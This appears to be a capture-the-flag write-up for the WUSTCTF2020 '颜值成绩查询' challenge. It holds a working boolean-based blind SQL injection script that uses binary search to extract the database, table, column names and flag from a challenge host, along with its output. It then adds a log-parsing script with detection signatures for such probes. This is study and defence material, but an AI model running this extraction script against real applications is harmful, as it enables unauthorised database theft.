[WUSTCTF2020]颜值成绩查询

Opening the page shows an input box that looks up a record, so SQL injection is the first thing to try. Start with:

if(length(database()) > 1, 1, 0)

This returns a record, but entering:

if(length(database()) > 3, 1, 0)

returns nothing. The page therefore answers a true/false question about the database, which is a boolean-based blind injection, and the flag can be recovered one character at a time. Script:

import requests

# Challenge instance from the writeup; the value of stunum is concatenated into the query.
Original_url = "http://26d6f65d-9a43-404c-bd19-01f916f30201.node4.buuoj.cn:81/?stunum="
# The page shows this text only when the injected condition evaluates to true.
Success_message = "Hi"


def oracle(condition):
    """Ask the page one yes/no question: does the injected condition hold?"""
    resp = requests.get(Original_url + condition, timeout=100)
    return Success_message in resp.text


def extract(payload, label, max_len):
    """Recover a string one character at a time through the boolean oracle.

    payload(pos, threshold) must return the injected condition
    "ascii of the character at pos > threshold". Each character is located by
    binary search over the printable range 32..126, so it costs about 7
    requests instead of up to 95 with a linear scan.
    """
    result = ''
    for i in range(1, max_len):  # position i of the value being extracted
        begin, end = 32, 126
        mid = (begin + end) // 2  # floor division
        while begin < end:
            if oracle(payload(i, mid)):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            # Past the end of the string substr() yields '' and ascii('') is 0,
            # so every comparison is false and the search collapses to 32:
            # the value is complete.
            print()
            break
        result += chr(mid)
        print("\r" + label + result, end="")
    return result


def database_name():
    return extract(
        lambda i, mid: "if(ascii(substr(database(), %d, 1)) > %d, 1, 0)" % (i, mid),
        "数据库名: ", 10)


def table_name():
    # /**/ stands in for spaces inside the subquery.
    names = extract(
        lambda j, mid: 'if((select/**/ascii(substr(group_concat(table_name),%d,1))/**/from/**/information_schema.tables/**/where/**/table_schema=database())>%d,1,0)' % (j, mid),
        "表名: ", 100)
    for tbl in names.split(","):
        column_name(tbl)


def column_name(tbl):
    cols = extract(
        lambda j, mid: 'if((select/**/ascii(substr(group_concat(column_name),%d,1))/**/from/**/information_schema.columns/**/where/**/table_name="%s"/**/and/**/table_schema=database()) > %d, 1, 0)' % (j, tbl, mid),
        "表%s的字段名: " % tbl, 100)
    for col in cols.split(","):
        GetData(tbl, col)


def GetData(tbl, col):
    extract(
        lambda i, mid: 'if(ascii(substr((select/**/%s/**/from/**/%s),%d,1)) > %d,1, -1)' % (col, tbl, i, mid),
        "表%s的字段%s数据: " % (tbl, col), 100)


database_name()
table_name()

Output:

数据库名: ctf
表名: flag,score
表flag的字段名: flag,value
表flag的字段flag数据: flag
表flag的字段value数据: flag{1f57fe04-406e-4037-b313-2dba09c240b7}
表score的字段名: id,name,score

Binary search over the character range is what keeps this fast: each character needs about seven requests rather than one request per candidate value.
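From the defender's side, both the oracle described at the top of the writeup and the binary search just mentioned leave a very recognisable trail in the web server's access log: every probe carries if(, ascii(substr(, database() or information_schema in the stunum parameter, and the binary search repeats one query shape with only the position and the threshold changing. The following Python script is an added example, not part of the original writeup or the challenge. It parses a few constructed access-log lines in combined format, URL-decodes the parameter, turns the /**/ comments used in place of spaces back into whitespace, and reports the client whose requests match that pattern. The IP addresses, timestamps and request sizes are placeholders; the parameter name stunum and the probe shapes are the ones shown above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (combined log format); hosts and timestamps are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?stunum=2 HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?stunum=if(length(database())%20%3E%201,%201,%200) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?stunum=if(ascii(substr(database(),%201,%201))%20%3E%2079,%201,%200) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?stunum=if(ascii(substr(database(),%201,%201))%20%3E%20102,%201,%200) HTTP/1.1" 200 301
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?stunum=if((select/**/ascii(substr(group_concat(table_name),1,1))/**/from/**/information_schema.tables/**/where/**/table_schema=database())>79,1,0) HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?stunum=100 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures are applied to the decoded, comment-stripped parameter value.
SIGNATURES = [
    ("conditional_if", re.compile(r"\bif\s*\(", re.I)),
    ("char_probe", re.compile(r"\bascii\s*\(\s*substr", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("db_function", re.compile(r"\bdatabase\s*\(\s*\)", re.I)),
    ("subselect", re.compile(r"\bselect\b", re.I)),
]
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)


def normalize(value):
    """Replace inline comments (the /**/ whitespace substitute) with spaces and
    collapse runs of whitespace, so the signatures match regardless of spacing."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub(" ", value)).strip()


def match_signatures(value):
    """Return the names of all signatures present in one (URL-decoded) parameter value."""
    norm = normalize(value)
    hits = [name for name, pat in SIGNATURES if pat.search(norm)]
    if "/*" in value:
        hits.append("inline_comment")
    return hits


def probe_template(value):
    """Replace numeric literals with N, so successive binary-search probes
    (same query, different position or threshold) collapse to one template."""
    return re.sub(r"\d+", "N", normalize(value))


def analyze_log(text, param="stunum"):
    """Group suspicious requests per client and flag oracle-style probing."""
    seen = defaultdict(lambda: {"flagged": 0, "signatures": set(), "templates": defaultdict(int)})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs already URL-decodes the values.
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in qs.get(param, []):
            hits = match_signatures(value)
            if not hits:
                continue
            entry = seen[m["ip"]]
            entry["flagged"] += 1
            entry["signatures"].update(hits)
            entry["templates"][probe_template(value)] += 1
    report = {}
    for ip, e in seen.items():
        # The same template with changing constants is the shape of a
        # character-by-character oracle: roughly 7 probes (log2 of 95) per character.
        repeated = max(e["templates"].values(), default=0)
        report[ip] = {
            "flagged": e["flagged"],
            "signatures": sorted(e["signatures"]),
            "oracle_probing": repeated >= 2,
        }
    return report


if __name__ == "__main__":
    for ip, info in analyze_log(SAMPLE_LOG).items():
        print(ip, info)
```

Run against the constructed lines, only 10.0.0.9 is reported: four flagged requests, every signature present, and oracle_probing set because two probes share one template and differ only in the threshold. The same normalisation (decode, drop comments, collapse whitespace) is what a WAF rule or log pipeline needs before pattern matching, otherwise the /**/ spacing alone is enough to slip past a naive keyword check.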

